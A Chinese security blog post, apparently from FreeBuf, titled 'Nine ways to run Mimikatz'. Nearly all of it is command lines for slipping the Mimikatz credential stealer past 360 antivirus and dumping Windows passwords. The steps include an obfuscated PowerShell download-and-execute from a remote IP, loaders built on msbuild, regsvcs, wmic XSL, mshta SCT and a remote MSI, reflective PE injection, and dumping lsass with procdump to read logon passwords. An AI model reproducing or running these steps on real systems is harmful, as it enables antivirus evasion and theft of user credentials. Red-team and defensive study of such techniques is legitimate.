九种姿势运行Mimikatz
source link: http://www.freebuf.com/articles/web/176796.html?amp%3Butm_medium=referral
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
*本文原创作者:R1ngk3y,本文属FreeBuf原创奖励计划,未经许可禁止转载
前言
平时收集的一些姿势,用户绕过杀软执行mimikatz,这里以360为例进行bypass 测试。
下载最新版360:
未经处理的mimikatz直接就被杀了
下面开始进行绕过360抓密码
姿势一-powershell
https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1
cmd下执行
C:\Users\test\Desktop>powershell -exec bypass "import-module .\Invoke-Mimikatz.ps1;Invoke-Mimikatz"
也可以远程加载
powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.101/Invoke-Mimikatz.ps1');Invoke-Mimikatz
但是powershell被360拦截
简单混淆就bypass了
powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'192.168.0'+'.101/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').REplaCE('1vc',[STRing][CHAR]39)|IeX"
动图: http://ringk3y.com/wp-content/uploads/2018/07/1.gif
姿势二-用.net2.0加载mimikatz
作者Casey Smith, Twitter: @subTee
下载
https://gist.githubusercontent.com/nicholasmckinney/896b508b6cf1e8c3e567ccab29c8d3ec/raw/afa7219adbfcdfc160c163273ef8ec61ff0658b4/katz.cs
将katz.cs放置C:\Windows\Microsoft.NET\Framework\v2.0.50727
先powoershell执行
$key = 'BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVAgSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitolufo7Ucjh+WvZAU//dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHcgJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3rpZ9tbLZUefrFnLNiHfVjNi53Yg4=' $Content = [System.Convert]::FromBase64String($key) Set-Contentkey.snk -Value $Content -EncodingByte
再cmd执行
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe katz.exe
动图: http://ringk3y.com/wp-content/uploads/2018/07/1-1.gif
姿势三-JS加载mimikatz
用DotNetToJScript实现
https://github.com/tyranid/DotNetToJScript
mimikatz
https://gist.github.com/500646/14051b27b45dce37818aca915e93062f/raw/2adcc9d2570b4367c6cc405e5a5969863d04fc9b/katz.js
执行cscript mimikatz.js
但是这个方法已经会被一些杀软标记成恶意软件,绕过方法参考
https://evi1cg.me/archives/AMSI_bypass.html
姿势四-msiexec加载mimikatz
作者 homjxi0e
下载
https://github.com/homjxi0e/PowerScript/blob/master/Mimikatz.2.1.1/X64/Mimikatz%20x64.msi
远程执行
PS:> msiexec.exe /passive /i https://github.com/homjxi0e/PowerScript/raw/master/Mimikatz.2.1.1/X64/Mimikatz%20x64.msi /norestartcmd:> msiexec.exe /passive /i https://github.com/homjxi0e/PowerScript/raw/master/Mimikatz.2.1.1/X64/Mimikatz%20x64.msi /norestart
本地执行
msiexec /passive /i C:\Users\Administrator\Downloads\Mimikatz.msi
姿势五-.net4.0加载mimikatz
作者 subTee
下载mimikatz.xml
https://raw.githubusercontent.com/3gstudent/msbuild-inline-task/master/executes%20mimikatz.xml
执行
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild<.exemimikatz.xml
姿势六-JScript的xsl版
作者 subTee
下载
https:/gist.github.com/manasmbellani/7f3e39170f5bc8e3a493c62b80e69427/raw/87550d0fc03023bab99ad83ced657b9ef272a3b2/mimikatz.xsl
本地加载
wmic os get /format:"mimikatz.xsl"
远程加载
wmic os get /format:"http://127.0.0.1/mimikatz.xsl"
姿势七-jscript的sct版
作者 subTee
下载
https:/gist.github.com/caseysmithrc/3fe7a8330a74b303562eb494d47e79c5/raw/9336891fc81ac71bfff3c8fd4a8816dead30964e/mimikatz.sct
执行
mshta.exe javascript:a=GetObject("script:https://gist.github.com/caseysmithrc/3fe7a8330a74b303562eb494d47e79c5/raw/9336891fc81ac71bfff3c8fd4a8816dead30964e/mimikatz.sct").Exec(); log coffee exit
姿势八-内存中加载mimikatz
下载
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1
执行
powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.101/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://192.168.0.101/mimikatz.exe -ExeArgs "sekurlsa::logonpasswords" -ForceASLR
动图: http://ringk3y.com/wp-content/uploads/2018/07/1-2.gif
姿势九-导出lsass进程离线读密码
下载procdump64.exe
执行
procdump64.exe-accepteula-malsass.exe 1.dmp
也可以在任务管理器中操作
然后将1.dmp下载到本地
mimikatz_2.1_64.exe "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit
总结
1.对比这几种方式个人还是喜欢导出lsass进程内存方式来读取密码。
2.也可以用powershell远程加载mimikatz脚本读密码,简单方便。
*本文原创作者:R1ngk3y,本文属FreeBuf原创奖励计划,未经许可禁止转载
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK